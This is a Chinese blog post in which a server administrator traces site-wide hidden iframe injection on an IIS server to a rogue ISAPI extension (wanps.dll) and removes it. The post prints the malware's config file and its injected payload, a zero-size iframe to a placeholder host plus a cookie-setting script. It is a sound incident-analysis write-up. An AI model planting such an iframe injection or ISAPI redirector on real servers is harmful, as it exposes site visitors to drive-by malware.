HTMer

研究互联网络和电脑应用技术的IT技术网。 (勤奋+智慧→理想)

« HTMer今天终于拿到ICP备案2008年春节拜年短信集锦 »

做了安全配置的IIS服务器仍被挂马问题探讨

    最新,笔者单位有台服务器,全服务器所有网站都被挂马(前提是笔者已经做了FSO安全配置,每个网站都设定单独访问用户),不仅是ASP文件被挂马,甚至有些HTML文件也被挂马,查看源代码中却找不到挂马的代码。被挂马的网站头部都显示如下形式的代码:

<iframe src="http://xxx.xxx/xxx height=0 width=0></iframe>

    起初怀疑是JS代码搞鬼,查看服务器上所有JS文件,找了半天也没发现。于是我就新建一个HTML文件,然后浏览,依然有上面形式的代码(我晕~~~怀疑自己机子中木马,换台机器依然如此,而且上其他网站好的)。

    实在是没折了,打开IIS看看呢,问题找到了,在主IIS上,右击“属性”,在ISAPI里发现一个ISAPI扩展,从没见过的,路径为:C:\WINDOWS\Help\wanps.dll,加载正常,取消此ISAPI扩展,重新启动IIS后,所有代码消失,问题到此解决,就是这个ISAPI扩展搞的鬼,下面来瞧瞧加载项的具体内容:

wanps.ini内容为:
Cookie=GAG5=ABCDEFG
Redirector=C:\windows\help\wanps.txt

 

wanps.txt内容为:
<body>
<iframe src="http://xxx.xxx/xxx height=0 width=0></iframe>
<script language="javascript">
<!--
var expires = new Date();
expires.setTime(expires.getTime() + 5 * 24* 60 * 60 * 1000);
document.cookie="GAG5=ABCDEFG;expires="+expires.toGMTString();
-->
</script>
</body>

 



欢迎转载,转载请注明:转载自HTMer [ http://www.htmer.com/ ]

本文链接地址:http://www.htmer.com/article/37.htm

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

HTMer , Powered By Z-Blog, 苏ICP备08003082号

本站采用创作共用版权协议, 要求署名、非商业用途和保持一致. 转载本站内容必须也遵循“署名-非商业用途-保持一致”的创作共用协议.
HTM|HTML|ASP|PHP|JSP|Mysql|SQL|Dreamweaver|Flash|Fireworks|Photoshop|SEO Copyright www.HTMer.com. Some Rights Reserved. English Version